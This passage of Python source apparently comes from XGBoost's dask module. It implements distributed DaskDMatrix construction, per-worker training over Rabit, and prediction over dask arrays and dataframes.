the caller's responsibility to balance the data.
.. versionadded:: 1.0.0
Parameters
----------
client :
Specify the dask client used for training. Use default client returned from dask
if it's set to None.
'''
@_deprecate_positional_args
def __init__(
self,
client: "distributed.Client",
data: _DaskCollection,
label: Optional[_DaskCollection] = None,
*,
weight: Optional[_DaskCollection] = None,
base_margin: Optional[_DaskCollection] = None,
missing: Optional[float] = None,
silent: bool = False, # pylint: disable=unused-argument
feature_names: Optional[Union[str, List[str]]] = None,
feature_types: Optional[Union[Any, List[Any]]] = None,
group: Optional[_DaskCollection] = None,
qid: Optional[_DaskCollection] = None,
label_lower_bound: Optional[_DaskCollection] = None,
label_upper_bound: Optional[_DaskCollection] = None,
feature_weights: Optional[_DaskCollection] = None,
enable_categorical: bool = False
) -> None:
_assert_dask_support()
client = _xgb_get_client(client)
self.feature_names = feature_names
self.feature_types = feature_types
self.missing = missing
if qid is not None and weight is not None:
raise NotImplementedError("per-group weight is not implemented.")
if group is not None:
raise NotImplementedError(
"group structure is not implemented, use qid instead."
)
if enable_categorical:
raise NotImplementedError(
"categorical support is not enabled on `DaskDMatrix`."
)
if len(data.shape) != 2:
raise ValueError(
"Expecting 2 dimensional input, got: {shape}".format(shape=data.shape)
)
if not isinstance(data, (dd.DataFrame, da.Array)):
raise TypeError(_expect((dd.DataFrame, da.Array), type(data)))
if not isinstance(label, (dd.DataFrame, da.Array, dd.Series, type(None))):
raise TypeError(_expect((dd.DataFrame, da.Array, dd.Series), type(label)))
self._n_cols = data.shape[1]
assert isinstance(self._n_cols, int)
self.worker_map: Dict[str, "distributed.Future"] = defaultdict(list)
self.is_quantile: bool = False
self._init = client.sync(
self._map_local_data,
client,
data,
label=label,
weights=weight,
base_margin=base_margin,
qid=qid,
feature_weights=feature_weights,
label_lower_bound=label_lower_bound,
label_upper_bound=label_upper_bound,
)
def __await__(self) -> Generator:
return self._init.__await__()
async def _map_local_data(
self,
client: "distributed.Client",
data: _DaskCollection,
label: Optional[_DaskCollection] = None,
weights: Optional[_DaskCollection] = None,
base_margin: Optional[_DaskCollection] = None,
qid: Optional[_DaskCollection] = None,
feature_weights: Optional[_DaskCollection] = None,
label_lower_bound: Optional[_DaskCollection] = None,
label_upper_bound: Optional[_DaskCollection] = None
) -> "DaskDMatrix":
'''Obtain references to local data.'''
def inconsistent(
left: List[Any], left_name: str, right: List[Any], right_name: str
) -> str:
msg = 'Partitions between {a_name} and {b_name} are not ' \
'consistent: {a_len} != {b_len}. ' \
'Please try to repartition/rechunk your data.'.format(
a_name=left_name, b_name=right_name, a_len=len(left),
b_len=len(right)
)
return msg
def check_columns(parts: Any) -> None:
# x is required to be 2 dim in __init__
assert parts.ndim == 1 or parts.shape[1], 'Data should be' \
' partitioned by row. To avoid this specify the number' \
' of columns for your dask Array explicitly. e.g.' \
' chunks=(partition_size, X.shape[1])'
data = client.persist(data)
# client.persist returns new collections, so rebind the persisted versions
# instead of discarding them in a loop variable
label, weights, base_margin, label_lower_bound, label_upper_bound = [
client.persist(meta) if meta is not None else None
for meta in (label, weights, base_margin, label_lower_bound,
label_upper_bound)]
# Breaking data into partitions, a trick borrowed from dask_xgboost.
# `to_delayed` downgrades high-level objects into numpy or pandas
# equivalents.
X_parts = data.to_delayed()
if isinstance(X_parts, numpy.ndarray):
check_columns(X_parts)
X_parts = X_parts.flatten().tolist()
def flatten_meta(
meta: Optional[_DaskCollection]
) -> "Optional[List[dask.delayed.Delayed]]":
if meta is not None:
meta_parts = meta.to_delayed()
if isinstance(meta_parts, numpy.ndarray):
check_columns(meta_parts)
meta_parts = meta_parts.flatten().tolist()
return meta_parts
return None
y_parts = flatten_meta(label)
w_parts = flatten_meta(weights)
margin_parts = flatten_meta(base_margin)
qid_parts = flatten_meta(qid)
ll_parts = flatten_meta(label_lower_bound)
lu_parts = flatten_meta(label_upper_bound)
parts = [X_parts]
meta_names = []
def append_meta(
m_parts: Optional[List["dask.delayed.delayed"]], name: str
) -> None:
if m_parts is not None:
assert len(X_parts) == len(
m_parts), inconsistent(X_parts, 'X', m_parts, name)
parts.append(m_parts)
meta_names.append(name)
append_meta(y_parts, 'labels')
append_meta(w_parts, 'weights')
append_meta(margin_parts, 'base_margin')
append_meta(qid_parts, 'qid')
append_meta(ll_parts, 'label_lower_bound')
append_meta(lu_parts, 'label_upper_bound')
# At this point, `parts` looks like:
# [(x0, x1, ..), (y0, y1, ..), ..] in delayed form
# delay the zipped result
parts = list(map(dask.delayed, zip(*parts))) # pylint: disable=no-member
# At this point, the mental model should look like:
# [(x0, y0, ..), (x1, y1, ..), ..] in delayed form
parts = client.compute(parts)
await distributed.wait(parts) # async wait for parts to be computed
for part in parts:
assert part.status == 'finished', part.status
# Preserving the partition order for prediction.
self.partition_order = {}
for i, part in enumerate(parts):
self.partition_order[part.key] = i
key_to_partition = {part.key: part for part in parts}
who_has = await client.scheduler.who_has(keys=[part.key for part in parts])
worker_map: Dict[str, "distributed.Future"] = defaultdict(list)
for key, workers in who_has.items():
worker_map[next(iter(workers))].append(key_to_partition[key])
self.worker_map = worker_map
self.meta_names = meta_names
if feature_weights is None:
self.feature_weights = None
else:
self.feature_weights = await client.compute(feature_weights).result()
return self
def _create_fn_args(self, worker_addr: str) -> Dict[str, Any]:
'''Create a dictionary of objects that can be pickled for function
arguments.
'''
return {'feature_names': self.feature_names,
'feature_types': self.feature_types,
'feature_weights': self.feature_weights,
'meta_names': self.meta_names,
'missing': self.missing,
'parts': self.worker_map.get(worker_addr, None),
'is_quantile': self.is_quantile}
def num_col(self) -> int:
return self._n_cols
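# Minimal construction sketch (assumes a running dask cluster/client):
#
# from distributed import Client
# import dask.array as da
# import xgboost as xgb
#
# client = Client() # or Client('<scheduler-address>')
# X = da.random.random((1000, 20), chunks=(100, 20))
# y = da.random.random(1000, chunks=100)
# dtrain = xgb.dask.DaskDMatrix(client, X, y)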
_DataParts = List[Tuple[Any, Optional[Any], Optional[Any], Optional[Any], Optional[Any],
Optional[Any], Optional[Any]]]
def _get_worker_parts_ordered(
meta_names: List[str], list_of_parts: _DataParts
) -> _DataParts:
# List of partitions like: [(x3, y3, w3, m3, ..), ..], order is not preserved.
assert isinstance(list_of_parts, list)
result = []
for i, _ in enumerate(list_of_parts):
data = list_of_parts[i][0]
labels = None
weights = None
base_margin = None
qid = None
label_lower_bound = None
label_upper_bound = None
# Iterate through all possible meta info; this brings only small overhead
# since xgboost has a constant number of meta info fields.
for j, blob in enumerate(list_of_parts[i][1:]):
if meta_names[j] == 'labels':
labels = blob
elif meta_names[j] == 'weights':
weights = blob
elif meta_names[j] == 'base_margin':
base_margin = blob
elif meta_names[j] == 'qid':
qid = blob
elif meta_names[j] == 'label_lower_bound':
label_lower_bound = blob
elif meta_names[j] == 'label_upper_bound':
label_upper_bound = blob
else:
raise ValueError('Unknown metainfo:', meta_names[j])
result.append((data, labels, weights, base_margin, qid, label_lower_bound,
label_upper_bound))
return result
def _unzip(list_of_parts: _DataParts) -> List[Tuple[Any, ...]]:
return list(zip(*list_of_parts))
def _get_worker_parts(
list_of_parts: _DataParts, meta_names: List[str]
) -> List[Tuple[Any, ...]]:
partitions = _get_worker_parts_ordered(meta_names, list_of_parts)
partitions_unzipped = _unzip(partitions)
return partitions_unzipped
class DaskPartitionIter(DataIter): # pylint: disable=R0902
"""A data iterator for `DaskDeviceQuantileDMatrix`."""
def __init__(
self,
data: Tuple[Any, ...],
label: Optional[Tuple[Any, ...]] = None,
weight: Optional[Tuple[Any, ...]] = None,
base_margin: Optional[Tuple[Any, ...]] = None,
qid: Optional[Tuple[Any, ...]] = None,
label_lower_bound: Optional[Tuple[Any, ...]] = None,
label_upper_bound: Optional[Tuple[Any, ...]] = None,
feature_names: Optional[Union[str, List[str]]] = None,
feature_types: Optional[Union[Any, List[Any]]] = None
) -> None:
self._data = data
self._labels = label
self._weights = weight
self._base_margin = base_margin
self._qid = qid
self._label_lower_bound = label_lower_bound
self._label_upper_bound = label_upper_bound
self._feature_names = feature_names
self._feature_types = feature_types
assert isinstance(self._data, Sequence)
types = (Sequence, type(None))
assert isinstance(self._labels, types)
assert isinstance(self._weights, types)
assert isinstance(self._base_margin, types)
assert isinstance(self._label_lower_bound, types)
assert isinstance(self._label_upper_bound, types)
self._iter = 0 # set iterator to 0
super().__init__()
def data(self) -> Any:
'''Utility function for obtaining current batch of data.'''
return self._data[self._iter]
def labels(self) -> Any:
'''Utility function for obtaining current batch of label.'''
if self._labels is not None:
return self._labels[self._iter]
return None
def weights(self) -> Any:
'''Utility function for obtaining current batch of weight.'''
if self._weights is not None:
return self._weights[self._iter]
return None
def qids(self) -> Any:
'''Utility function for obtaining current batch of query id.'''
if self._qid is not None:
return self._qid[self._iter]
return None
def base_margins(self) -> Any:
'''Utility function for obtaining current batch of base_margin.'''
if self._base_margin is not None:
return self._base_margin[self._iter]
return None
def label_lower_bounds(self) -> Any:
'''Utility function for obtaining current batch of label_lower_bound.
'''
if self._label_lower_bound is not None:
return self._label_lower_bound[self._iter]
return None
def label_upper_bounds(self) -> Any:
'''Utility function for obtaining current batch of label_upper_bound.
'''
if self._label_upper_bound is not None:
return self._label_upper_bound[self._iter]
return None
def reset(self) -> None:
'''Reset the iterator'''
self._iter = 0
def next(self, input_data: Callable) -> int:
'''Yield next batch of data'''
if self._iter == len(self._data):
# Return 0 when there's no more batch.
return 0
feature_names: Optional[Union[List[str], str]] = None
if self._feature_names:
feature_names = self._feature_names
else:
if hasattr(self.data(), 'columns'):
feature_names = self.data().columns.format()
else:
feature_names = None
input_data(data=self.data(), label=self.labels(),
weight=self.weights(), group=None,
qid=self.qids(),
label_lower_bound=self.label_lower_bounds(),
label_upper_bound=self.label_upper_bounds(),
feature_names=feature_names,
feature_types=self._feature_types)
self._iter += 1
return 1
class DaskDeviceQuantileDMatrix(DaskDMatrix):
'''Specialized data type for `gpu_hist` tree method. This class is used to reduce the
memory usage by eliminating data copies. Internally, all partitions/chunks of data
are merged by weighted GK sketching. So the number of partitions from dask may affect
training accuracy as GK generates bounded error for each merge. See doc string for
:py:obj:`xgboost.DeviceQuantileDMatrix` and :py:obj:`xgboost.DMatrix` for other
parameters.
.. versionadded:: 1.2.0
Parameters
----------
max_bin : Number of bins for histogram construction.
'''
@_deprecate_positional_args
def __init__(
self,
client: "distributed.Client",
data: _DaskCollection,
label: Optional[_DaskCollection] = None,
*,
weight: Optional[_DaskCollection] = None,
base_margin: Optional[_DaskCollection] = None,
missing: Optional[float] = None,
silent: bool = False, # pylint: disable=unused-argument
feature_names: Optional[Union[str, List[str]]] = None,
feature_types: Optional[Union[Any, List[Any]]] = None,
max_bin: int = 256,
group: Optional[_DaskCollection] = None,
qid: Optional[_DaskCollection] = None,
label_lower_bound: Optional[_DaskCollection] = None,
label_upper_bound: Optional[_DaskCollection] = None,
feature_weights: Optional[_DaskCollection] = None,
enable_categorical: bool = False,
) -> None:
super().__init__(
client=client,
data=data,
label=label,
weight=weight,
base_margin=base_margin,
group=group,
qid=qid,
label_lower_bound=label_lower_bound,
label_upper_bound=label_upper_bound,
missing=missing,
silent=silent,
feature_weights=feature_weights,
feature_names=feature_names,
feature_types=feature_types,
enable_categorical=enable_categorical,
)
self.max_bin = max_bin
self.is_quantile = True
def _create_fn_args(self, worker_addr: str) -> Dict[str, Any]:
args = super()._create_fn_args(worker_addr)
args["max_bin"] = self.max_bin
return args
def _create_device_quantile_dmatrix(
feature_names: Optional[Union[str, List[str]]],
feature_types: Optional[Union[Any, List[Any]]],
feature_weights: Optional[Any],
meta_names: List[str],
missing: float,
parts: Optional[_DataParts],
max_bin: int,
) -> DeviceQuantileDMatrix:
worker = distributed.get_worker()
if parts is None:
msg = "worker {address} has an empty DMatrix.".format(address=worker.address)
LOGGER.warning(msg)
import cupy
d = DeviceQuantileDMatrix(
cupy.zeros((0, 0)),
feature_names=feature_names,
feature_types=feature_types,
max_bin=max_bin,
)
return d
(
data,
labels,
weights,
base_margin,
qid,
label_lower_bound,
label_upper_bound,
) = _get_worker_parts(parts, meta_names)
it = DaskPartitionIter(
data=data,
label=labels,
weight=weights,
base_margin=base_margin,
qid=qid,
label_lower_bound=label_lower_bound,
label_upper_bound=label_upper_bound,
)
dmatrix = DeviceQuantileDMatrix(
it,
missing=missing,
feature_names=feature_names,
feature_types=feature_types,
nthread=worker.nthreads,
max_bin=max_bin,
)
dmatrix.set_info(feature_weights=feature_weights)
return dmatrix
def _create_dmatrix(
feature_names: Optional[Union[str, List[str]]],
feature_types: Optional[Union[Any, List[Any]]],
feature_weights: Optional[Any],
meta_names: List[str],
missing: float,
parts: Optional[_DataParts]
) -> DMatrix:
'''Get data that local to worker from DaskDMatrix.
Returns
-------
A DMatrix object.
'''
worker = distributed.get_worker()
list_of_parts = parts
if list_of_parts is None:
msg = 'worker {address} has an empty DMatrix. '.format(address=worker.address)
LOGGER.warning(msg)
d = DMatrix(numpy.empty((0, 0)),
feature_names=feature_names,
feature_types=feature_types)
return d
T = TypeVar('T')
def concat_or_none(data: Tuple[Optional[T], ...]) -> Optional[T]:
if any(part is None for part in data):
return None
return concat(data)
(data, labels, weights, base_margin, qid,
label_lower_bound, label_upper_bound) = _get_worker_parts(list_of_parts, meta_names)
_labels = concat_or_none(labels)
_weights = concat_or_none(weights)
_base_margin = concat_or_none(base_margin)
_qid = concat_or_none(qid)
_label_lower_bound = concat_or_none(label_lower_bound)
_label_upper_bound = concat_or_none(label_upper_bound)
_data = concat(data)
dmatrix = DMatrix(
_data,
_labels,
missing=missing,
feature_names=feature_names,
feature_types=feature_types,
nthread=worker.nthreads,
)
dmatrix.set_info(
base_margin=_base_margin,
qid=_qid,
weight=_weights,
label_lower_bound=_label_lower_bound,
label_upper_bound=_label_upper_bound,
feature_weights=feature_weights,
)
return dmatrix
def _dmatrix_from_list_of_parts(
is_quantile: bool, **kwargs: Any
) -> Union[DMatrix, DeviceQuantileDMatrix]:
if is_quantile:
return _create_device_quantile_dmatrix(**kwargs)
return _create_dmatrix(**kwargs)
async def _get_rabit_args(n_workers: int, client: "distributed.Client") -> List[bytes]:
'''Get rabit context arguments from data distribution in DaskDMatrix.'''
env = await client.run_on_scheduler(_start_tracker, n_workers)
rabit_args = [('%s=%s' % item).encode() for item in env.items()]
return rabit_args
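# e.g. an env of {'DMLC_NUM_WORKER': 2, 'DMLC_TRACKER_PORT': 9091} becomes
# [b'DMLC_NUM_WORKER=2', b'DMLC_TRACKER_PORT=9091'], ready for RabitContext.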
# train and predict methods are supposed to be "functional", which meets the
# dask paradigm. But as a side effect, the `evals_result` in single-node API
# is no longer supported since it mutates the input parameter, and it's not
# intuitive to sync the mutation result. Therefore, a dictionary containing
# evaluation history is instead returned.
def _get_workers_from_data(
dtrain: DaskDMatrix,
evals: Optional[List[Tuple[DaskDMatrix, str]]]
) -> Set[str]:
X_worker_map: Set[str] = set(dtrain.worker_map.keys())
if evals:
for e in evals:
assert len(e) == 2
assert isinstance(e[0], DaskDMatrix) and isinstance(e[1], str)
if e[0] is dtrain:
continue
worker_map = set(e[0].worker_map.keys())
X_worker_map = X_worker_map.union(worker_map)
return X_worker_map
async def _train_async(
client: "distributed.Client",
global_config: Dict[str, Any],
params: Dict[str, Any],
dtrain: DaskDMatrix,
num_boost_round: int,
evals: Optional[List[Tuple[DaskDMatrix, str]]],
obj: Optional[Objective],
feval: Optional[Metric],
early_stopping_rounds: Optional[int],
verbose_eval: Union[int, bool],
xgb_model: Optional[Booster],
callbacks: Optional[List[TrainingCallback]]
) -> Optional[TrainReturnT]:
workers = list(_get_workers_from_data(dtrain, evals))
_rabit_args = await _get_rabit_args(len(workers), client)
if params.get("booster", None) == "gblinear":
raise NotImplementedError(
f"booster `{params['booster']}` is not yet supported for dask."
)
def dispatched_train(
worker_addr: str,
rabit_args: List[bytes],
dtrain_ref: Dict,
dtrain_idt: int,
evals_ref: Dict
) -> Optional[Dict[str, Union[Booster, Dict]]]:
'''Perform training on a single worker. A local function prevents pickling.
'''
LOGGER.debug('Training on %s', str(worker_addr))
worker = distributed.get_worker()
with RabitContext(rabit_args), config.config_context(**global_config):
local_dtrain = _dmatrix_from_list_of_parts(**dtrain_ref)
local_evals = []
if evals_ref:
for ref, name, idt in evals_ref:
if idt == dtrain_idt:
local_evals.append((local_dtrain, name))
continue
local_evals.append((_dmatrix_from_list_of_parts(**ref), name))
local_history: Dict = {}
local_param = params.copy() # just to be consistent
msg = 'Overriding `nthreads` defined in dask worker.'
override = ['nthread', 'n_jobs']
for p in override:
val = local_param.get(p, None)
if val is not None and val != worker.nthreads:
LOGGER.info(msg)
else:
local_param[p] = worker.nthreads
bst = worker_train(params=local_param,
dtrain=local_dtrain,
num_boost_round=num_boost_round,
evals_result=local_history,
evals=local_evals,
obj=obj,
feval=feval,
early_stopping_rounds=early_stopping_rounds,
verbose_eval=verbose_eval,
xgb_model=xgb_model,
callbacks=callbacks)
ret: Optional[Dict[str, Union[Booster, Dict]]] = {
'booster': bst, 'history': local_history}
if local_dtrain.num_row() == 0:
ret = None
return ret
# Note for function purity:
# XGBoost is deterministic in most of the cases, which means train function is
# supposed to be idempotent. One known exception is gblinear with shotgun updater.
# We haven't been able to do a full verification so here we keep pure to be False.
futures = []
for i, worker_addr in enumerate(workers):
if evals:
# pylint: disable=protected-access
evals_per_worker = [(e._create_fn_args(worker_addr), name, id(e))
for e, name in evals]
else:
evals_per_worker = []
f = client.submit(
dispatched_train,
worker_addr,
_rabit_args,
# pylint: disable=protected-access
dtrain._create_fn_args(workers[i]),
id(dtrain),
evals_per_worker,
pure=False,
workers=[worker_addr]
)
futures.append(f)
results = await client.gather(futures)
return list(filter(lambda ret: ret is not None, results))[0]
def train( # pylint: disable=unused-argument
client: "distributed.Client",
params: Dict[str, Any],
dtrain: DaskDMatrix,
num_boost_round: int = 10,
evals: Optional[List[Tuple[DaskDMatrix, str]]] = None,
obj: Optional[Objective] = None,
feval: Optional[Metric] = None,
early_stopping_rounds: Optional[int] = None,
xgb_model: Optional[Booster] = None,
verbose_eval: Union[int, bool] = True,
callbacks: Optional[List[TrainingCallback]] = None,
) -> Any:
"""Train XGBoost model.
.. versionadded:: 1.0.0
.. note::
Other parameters are the same as :py:func:`xgboost.train` except for
`evals_result`, which is returned as part of function return value instead of
argument.
Parameters
----------
client :
Specify the dask client used for training. Use default client returned from dask
if it's set to None.
Returns
-------
results: dict
A dictionary containing trained booster and evaluation history. `history` field
        is the same as `evals_result` from `xgboost.train`.
.. code-block:: python
{'booster': xgboost.Booster,
'history': {'train': {'logloss': ['0.48253', '0.35953']},
'eval': {'logloss': ['0.480385', '0.357756']}}}
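    A minimal usage sketch (illustrative; assumes an active ``distributed.Client``
    named ``client`` and dask collections ``X`` and ``y``):
    .. code-block:: python
        from xgboost import dask as dxgb
        dtrain = dxgb.DaskDMatrix(client, X, y)
        output = dxgb.train(client, {"tree_method": "hist"}, dtrain,
                            num_boost_round=10, evals=[(dtrain, "train")])
        booster = output["booster"]
        history = output["history"]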
"""
_assert_dask_support()
client = _xgb_get_client(client)
# Get global configuration before transferring computation to another thread or
# process.
return client.sync(_train_async, global_config=config.get_config(), **locals())
def _can_output_df(is_df: bool, output_shape: Tuple) -> bool:
return is_df and len(output_shape) <= 2
async def _direct_predict_impl(
mapped_predict: Callable,
booster: "distributed.Future",
data: _DaskCollection,
base_margin: Optional[_DaskCollection],
output_shape: Tuple[int, ...],
meta: Dict[int, str],
) -> _DaskCollection:
columns = list(meta.keys())
if len(output_shape) >= 3 and isinstance(data, dd.DataFrame):
        # Without this check, dask will finish the prediction silently even if the
        # output has more than 2 dimensions. But during map_partitions, dask passes a
# `dd.DataFrame` as local input to xgboost, which is converted to csr_matrix by
# `_convert_unknown_data` since dd.DataFrame is not known to xgboost native
# binding.
raise ValueError(
"Use `da.Array` or `DaskDMatrix` when output has more than 2 dimensions."
)
if _can_output_df(isinstance(data, dd.DataFrame), output_shape):
if base_margin is not None and isinstance(base_margin, da.Array):
# Easier for map_partitions
base_margin_df: Optional[dd.DataFrame] = base_margin.to_dask_dataframe()
else:
base_margin_df = base_margin
predictions = dd.map_partitions(
mapped_predict,
booster,
data,
True,
columns,
base_margin_df,
meta=dd.utils.make_meta(meta),
)
# classification can return a dataframe, drop 1 dim when it's reg/binary
if len(output_shape) == 1:
predictions = predictions.iloc[:, 0]
else:
if base_margin is not None and isinstance(
base_margin, (dd.Series, dd.DataFrame)
):
# Easier for map_blocks
base_margin_array: Optional[da.Array] = base_margin.to_dask_array()
else:
base_margin_array = base_margin
# Input data is 2-dim array, output can be 1(reg, binary)/2(multi-class,
# contrib)/3(contrib, interaction)/4(interaction) dims.
if len(output_shape) == 1:
drop_axis: Union[int, List[int]] = [1] # drop from 2 to 1 dim.
new_axis: Union[int, List[int]] = []
else:
drop_axis = []
if isinstance(data, dd.DataFrame):
new_axis = list(range(len(output_shape) - 2))
else:
new_axis = [i + 2 for i in range(len(output_shape) - 2)]
predictions = da.map_blocks(
mapped_predict,
booster,
data,
False,
columns,
base_margin_array,
drop_axis=drop_axis,
new_axis=new_axis,
dtype=numpy.float32,
)
return predictions
def _infer_predict_output(
booster: Booster, features: int, is_df: bool, inplace: bool, **kwargs: Any
) -> Tuple[Tuple[int, ...], Dict[int, str]]:
"""Create a dummy test sample to infer output shape for prediction."""
assert isinstance(features, int)
rng = numpy.random.RandomState(1994)
test_sample = rng.randn(1, features)
if inplace:
kwargs = kwargs.copy()
if kwargs.pop("predict_type") == "margin":
kwargs["output_margin"] = True
m = DMatrix(test_sample)
    # The generated DMatrix doesn't have feature names, so skip validation.
test_predt = booster.predict(m, validate_features=False, **kwargs)
n_columns = test_predt.shape[1] if len(test_predt.shape) > 1 else 1
meta: Dict[int, str] = {}
if _can_output_df(is_df, test_predt.shape):
for i in range(n_columns):
meta[i] = "f4"
return test_predt.shape, meta
async def _get_model_future(
client: "distributed.Client", model: Union[Booster, Dict, "distributed.Future"]
) -> "distributed.Future":
if isinstance(model, Booster):
booster = await client.scatter(model, broadcast=True)
elif isinstance(model, dict):
booster = await client.scatter(model["booster"], broadcast=True)
elif isinstance(model, distributed.Future):
booster = model
if booster.type is not Booster:
raise TypeError(
f"Underlying type of model future should be `Booster`, got {booster.type}"
)
else:
raise TypeError(_expect([Booster, dict, distributed.Future], type(model)))
return booster
# pylint: disable=too-many-statements
async def _predict_async(
client: "distributed.Client",
global_config: Dict[str, Any],
model: Union[Booster, Dict, "distributed.Future"],
data: _DaskCollection,
output_margin: bool,
missing: float,
pred_leaf: bool,
pred_contribs: bool,
approx_contribs: bool,
pred_interactions: bool,
validate_features: bool,
iteration_range: Tuple[int, int],
strict_shape: bool,
) -> _DaskCollection:
_booster = await _get_model_future(client, model)
if not isinstance(data, (DaskDMatrix, da.Array, dd.DataFrame)):
raise TypeError(_expect([DaskDMatrix, da.Array, dd.DataFrame], type(data)))
def mapped_predict(
booster: Booster, partition: Any, is_df: bool, columns: List[int], _: Any
) -> Any:
with config.config_context(**global_config):
m = DMatrix(data=partition, missing=missing)
predt = booster.predict(
data=m,
output_margin=output_margin,
pred_leaf=pred_leaf,
pred_contribs=pred_contribs,
approx_contribs=approx_contribs,
pred_interactions=pred_interactions,
validate_features=validate_features,
iteration_range=iteration_range,
strict_shape=strict_shape,
)
if _can_output_df(is_df, predt.shape):
if lazy_isinstance(partition, "cudf", "core.dataframe.DataFrame"):
import cudf
predt = cudf.DataFrame(predt, columns=columns, dtype=numpy.float32)
else:
predt = DataFrame(predt, columns=columns, dtype=numpy.float32)
return predt
# Predict on dask collection directly.
if isinstance(data, (da.Array, dd.DataFrame)):
_output_shape, meta = await client.compute(
client.submit(
_infer_predict_output,
_booster,
features=data.shape[1],
is_df=isinstance(data, dd.DataFrame),
inplace=False,
output_margin=output_margin,
pred_leaf=pred_leaf,
pred_contribs=pred_contribs,
approx_contribs=approx_contribs,
pred_interactions=pred_interactions,
strict_shape=strict_shape,
)
)
return await _direct_predict_impl(
mapped_predict, _booster, data, None, _output_shape, meta
)
output_shape, _ = await client.compute(
client.submit(
_infer_predict_output,
booster=_booster,
features=data.num_col(),
is_df=False,
inplace=False,
output_margin=output_margin,
pred_leaf=pred_leaf,
pred_contribs=pred_contribs,
approx_contribs=approx_contribs,
pred_interactions=pred_interactions,
strict_shape=strict_shape,
)
)
# Prediction on dask DMatrix.
partition_order = data.partition_order
feature_names = data.feature_names
feature_types = data.feature_types
missing = data.missing
meta_names = data.meta_names
    def dispatched_predict(booster: Booster, part: Any) -> numpy.ndarray:
        assert isinstance(part, tuple), type(part)
        data = part[0]
base_margin = None
for i, blob in enumerate(part[1:]):
if meta_names[i] == "base_margin":
base_margin = blob
with config.config_context(**global_config):
m = DMatrix(
data,
missing=missing,
base_margin=base_margin,
feature_names=feature_names,
feature_types=feature_types,
)
predt = booster.predict(
m,
output_margin=output_margin,
pred_leaf=pred_leaf,
pred_contribs=pred_contribs,
approx_contribs=approx_contribs,
pred_interactions=pred_interactions,
validate_features=validate_features,
)
return predt
all_parts = []
all_orders = []
all_shapes = []
workers_address = list(data.worker_map.keys())
for worker_addr in workers_address:
list_of_parts = data.worker_map[worker_addr]
all_parts.extend(list_of_parts)
all_orders.extend([partition_order[part.key] for part in list_of_parts])
for part in all_parts:
s = client.submit(lambda part: part[0].shape[0], part)
all_shapes.append(s)
all_shapes = await client.gather(all_shapes)
parts_with_order = list(zip(all_parts, all_shapes, all_orders))
parts_with_order = sorted(parts_with_order, key=lambda p: p[2])
all_parts = [part for part, shape, order in parts_with_order]
all_shapes = [shape for part, shape, order in parts_with_order]
futures = []
for part in all_parts:
f = client.submit(dispatched_predict, _booster, part)
futures.append(f)
# Constructing a dask array from list of numpy arrays
# See https://docs.dask.org/en/latest/array-creation.html
arrays = []
for i, rows in enumerate(all_shapes):
arrays.append(
da.from_delayed(
futures[i], shape=(rows,) + output_shape[1:], dtype=numpy.float32
)
)
predictions = da.concatenate(arrays, axis=0)
return predictions
def predict( # pylint: disable=unused-argument
client: "distributed.Client",
model: Union[TrainReturnT, Booster, "distributed.Future"],
data: Union[DaskDMatrix, _DaskCollection],
output_margin: bool = False,
missing: float = numpy.nan,
pred_leaf: bool = False,
pred_contribs: bool = False,
approx_contribs: bool = False,
pred_interactions: bool = False,
validate_features: bool = True,
iteration_range: Tuple[int, int] = (0, 0),
strict_shape: bool = False,
) -> Any:
'''Run prediction with a trained booster.
.. note::
Using ``inplace_predict`` might be faster when some features are not needed. See
:py:meth:`xgboost.Booster.predict` for details on various parameters. When output
has more than 2 dimensions (shap value, leaf with strict_shape), input should be
``da.Array`` or ``DaskDMatrix``.
.. versionadded:: 1.0.0
Parameters
----------
client:
Specify the dask client used for training. Use default client
returned from dask if it's set to None.
model:
The trained model. It can be a distributed.Future so user can
pre-scatter it onto all workers.
data:
Input data used for prediction. When input is a dataframe object,
prediction output is a series.
missing:
Used when input data is not DaskDMatrix. Specify the value
considered as missing.
Returns
-------
prediction: dask.array.Array/dask.dataframe.Series
When input data is ``dask.array.Array`` or ``DaskDMatrix``, the return value is an
array, when input data is ``dask.dataframe.DataFrame``, return value can be
``dask.dataframe.Series``, ``dask.dataframe.DataFrame``, depending on the output
shape.
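    A minimal usage sketch (illustrative; assumes ``output`` returned by
    :py:func:`xgboost.dask.train` and the same ``client`` and input ``X``):
    .. code-block:: python
        from xgboost import dask as dxgb
        predt = dxgb.predict(client, output["booster"], X)
        result = predt.compute()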
'''
_assert_dask_support()
client = _xgb_get_client(client)
return client.sync(_predict_async, global_config=config.get_config(), **locals())
async def _inplace_predict_async( # pylint: disable=too-many-branches
client: "distributed.Client",
global_config: Dict[str, Any],
model: Union[Booster, Dict, "distributed.Future"],
data: _DaskCollection,
iteration_range: Tuple[int, int],
predict_type: str,
missing: float,
validate_features: bool,
base_margin: Optional[_DaskCollection],
strict_shape: bool,
) -> _DaskCollection:
client = _xgb_get_client(client)
booster = await _get_model_future(client, model)
if not isinstance(data, (da.Array, dd.DataFrame)):
raise TypeError(_expect([da.Array, dd.DataFrame], type(data)))
if base_margin is not None and not isinstance(
data, (da.Array, dd.DataFrame, dd.Series)
):
raise TypeError(_expect([da.Array, dd.DataFrame, dd.Series], type(base_margin)))
def mapped_predict(
booster: Booster, data: Any, is_df: bool, columns: List[int], base_margin: Any
) -> Any:
with config.config_context(**global_config):
prediction = booster.inplace_predict(
data,
iteration_range=iteration_range,
predict_type=predict_type,
missing=missing,
base_margin=base_margin,
validate_features=validate_features,
strict_shape=strict_shape,
)
if _can_output_df(is_df, prediction.shape):
if lazy_isinstance(data, "cudf.core.dataframe", "DataFrame"):
import cudf
prediction = cudf.DataFrame(
prediction, columns=columns, dtype=numpy.float32
)
else:
# If it's from pandas, the partition is a numpy array
prediction = DataFrame(prediction, columns=columns, dtype=numpy.float32)
return prediction
# await turns future into value.
shape, meta = await client.compute(
client.submit(
_infer_predict_output,
booster,
features=data.shape[1],
is_df=isinstance(data, dd.DataFrame),
inplace=True,
predict_type=predict_type,
iteration_range=iteration_range,
strict_shape=strict_shape,
)
)
return await _direct_predict_impl(
mapped_predict, booster, data, base_margin, shape, meta
)
def inplace_predict( # pylint: disable=unused-argument
client: "distributed.Client",
model: Union[TrainReturnT, Booster, "distributed.Future"],
data: _DaskCollection,
iteration_range: Tuple[int, int] = (0, 0),
predict_type: str = "value",
missing: float = numpy.nan,
validate_features: bool = True,
base_margin: Optional[_DaskCollection] = None,
strict_shape: bool = False,
) -> Any:
"""Inplace prediction. See doc in :py:meth:`xgboost.Booster.inplace_predict` for details.
.. versionadded:: 1.1.0
Parameters
----------
client:
Specify the dask client used for training. Use default client
returned from dask if it's set to None.
model:
See :py:func:`xgboost.dask.predict` for details.
data :
dask collection.
iteration_range:
See :py:meth:`xgboost.Booster.predict` for details.
predict_type:
